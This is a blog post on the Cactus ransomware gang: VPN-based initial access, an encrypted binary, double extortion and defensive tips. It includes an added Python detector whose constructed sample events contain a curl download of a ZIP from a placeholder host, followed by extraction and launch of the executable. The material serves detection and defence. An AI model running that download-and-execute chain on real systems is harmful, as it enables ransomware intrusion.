Since March, a new ransomware gang called Cactus has been up to mischief in the digital world. The cybercriminals are particularly targeting VPN applications to gain initial access to the systems and networks. High-ranking companies are also increasingly being targeted and the gang is already demanding large ransoms. In our blog post, we explain how the Cactus ransomware works and what is known so far.
What is Cactus ransomware?
Cyber criminals are known for constantly coming up with new ways to inject malware and compromise systems. This is also the case with ransomware: the security researchers from “BleepingComputer” have discovered a new, sophisticated ransomware variant called “Cactus”. It mainly exploits weaknesses in VPN applications to get into other organisations' networks. The special thing about it: the Cactus ransomware can apparently encrypt itself in order to make detection by antivirus software more difficult. Combating it with common antivirus programs is therefore difficult.
How does the new Cactus ransomware work?
Typically, ransomware is delivered by malware that infects a target system. Once the ransomware has been loaded onto that system, it encrypts files, software and programs so that they can no longer be accessed. In this type of attack, the cyber criminals demand a ransom from the victims in exchange for decrypting the files.
What makes Cactus even more dangerous compared to other ransomware variants is that the attackers use encryption to protect the ransomware binary.
The attacks focus on vulnerabilities in known VPN servers from Fortinet. The cybercriminals access the network via the VPN server and execute a batch script that loads the actual ransomware. The malicious code is transmitted in a ZIP file and extracted after the download. Using a special key passed on the command line, the attackers can start the application and encrypt files on the affected system in such a way that users no longer have access.
Additional business model with Double Extortion
But that’s not all: before encryption, the files are transferred to the attackers’ servers. This gives the ransomware gang a second lever. Firstly, ransom money can be demanded for decrypting the files on the compromised system, and additionally the cyber criminals can threaten to publish the captured data. This threat is also stated in the Cactus ransom note.
Spread of ransomware Cactus
Ransomware Cactus mainly targets large companies with a lot of sensitive data, because these are more willing to pay larger ransom sums due to the high importance of the data. According to various reports, the ransom demands in previous Cactus attacks are said to be in the millions, and the attacks are specifically tailored to the respective victims. It is not yet known which companies have been affected by the Cactus attacks so far – no sensitive data has yet been published.
Who is behind Cactus ransomware?
It is not yet known who is behind the new ransomware gang. The investigation is proceeding swiftly.
How to protect yourself from ransomware Cactus
Cactus ransomware is extremely dangerous, as common virus scanners have difficulty detecting it because the ransomware binary is encrypted. But there are ways you can protect yourself from attacks.
- Updates: Install the latest software updates for your applications and keep internet-facing systems up to date
- Monitoring: Continuously monitor your network for abnormalities, especially PowerShell activity
- Password Manager: Implement a password manager to secure your credentials even better
- 2FA: Use two-factor authentication
- Monitor access: Check administrator and service accounts
- Backups: Create regular backups to protect essential data
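The execution chain described above (batch script, ZIP download, extraction, binary started with a command-line key) is something the monitoring tip can be turned into concretely. The following detector is an added example, not code from the original post or from any vendor: it correlates constructed process-creation events per host and alerts when a cmd.exe child fetches a ZIP archive, the same archive is extracted, and an executable is then launched from the extraction folder with arguments. The log field layout, the 15-minute window, the tool names and the `-key` switch are all assumptions for the demo, not Cactus indicators.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events for the demo (not real Cactus telemetry):
# (timestamp, host, parent_image, image, command_line)
SAMPLE_EVENTS = [
    ("2023-05-10T02:14:05", "srv01", "cmd.exe", "curl.exe",
     r"curl.exe -o C:\Users\Public\tmp\pkg.zip http://placeholder.invalid/pkg.zip"),
    ("2023-05-10T02:14:09", "srv01", "cmd.exe", "tar.exe",
     r"tar.exe -xf C:\Users\Public\tmp\pkg.zip -C C:\Users\Public\tmp\out"),
    ("2023-05-10T02:14:20", "srv01", "cmd.exe", r"C:\Users\Public\tmp\out\svc.exe",
     r"C:\Users\Public\tmp\out\svc.exe -key CONSTRUCTED"),  # real switch is not on the page
    ("2023-05-10T09:00:00", "ws07", "explorer.exe", "7zG.exe",
     r"7zG.exe x C:\Users\alice\Downloads\photos.zip"),     # benign: no download, no script parent
]

WINDOW = timedelta(minutes=15)                # assumed correlation window
WIN_PATH = re.compile(r'[A-Za-z]:\\[^\s"]+')  # absolute Windows paths inside a command line

def detect_chain(events):
    """Return (host, image, command_line) for every binary launched from a
    directory that a batch script populated from a freshly downloaded ZIP."""
    state, alerts = {}, []
    for ts, host, parent, image, cmdline in sorted(events):
        t = datetime.fromisoformat(ts)
        paths = WIN_PATH.findall(cmdline)
        st = state.get(host)
        if st and t - st["t"] > WINDOW:       # stale chain: forget it and start over
            state.pop(host)
            st = None
        # stage 1: a ZIP fetched from a URL by a child of a batch script (cmd.exe)
        zips = [p for p in paths if p.lower().endswith(".zip")]
        if parent.lower() == "cmd.exe" and "http" in cmdline.lower() and zips:
            state[host] = {"t": t, "zip": zips[0].lower(), "outdir": None}
            continue
        if not st:
            continue
        # stage 2: the same archive is extracted; destination is the last path argument,
        # or the archive's own folder when no destination is given
        if st["outdir"] is None and st["zip"] in cmdline.lower():
            dest = paths[-1] if paths[-1].lower() != st["zip"] else st["zip"].rsplit("\\", 1)[0]
            st.update(t=t, outdir=dest.lower().rstrip("\\") + "\\")
            continue
        # stage 3: an executable started from the extraction folder with arguments
        if st["outdir"] and image.lower().startswith(st["outdir"]) and len(cmdline.split()) > 1:
            alerts.append((host, image, cmdline))
    return alerts

if __name__ == "__main__":
    for alert in detect_chain(SAMPLE_EVENTS):
        print("ALERT chain completed:", alert)
```

Feeding real Sysmon or EDR process events into `detect_chain` only requires mapping them onto the five-field tuple; the benign ws07 extraction is deliberately ignored because no download stage precedes it.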
Cactus ransomware summary:
The cyber criminals behind Cactus ransomware have been active since at least March 2023. Ransomware Cactus is particularly dangerous because it encrypts itself and is therefore difficult to detect. This trick makes it possible for ransomware Cactus to bypass conventional antivirus scanners.
The main attack vectors are vulnerabilities in VPN applications. Monitoring deserves particular emphasis in averting the danger. For protection, it is therefore essential to install the latest software updates from the provider, continuously monitor your network and react quickly to any abnormalities.
Conclusion: Tricky ransomware Cactus spreads quickly
Ransomware remains a “never-ending story”: the new Cactus variant currently attacks primarily via Fortinet VPN servers. The “double extortion” approach aims to achieve a higher ransom, and the attacks are tailored specifically to the respective victim. Therefore, please note our tips on protection against ransomware Cactus.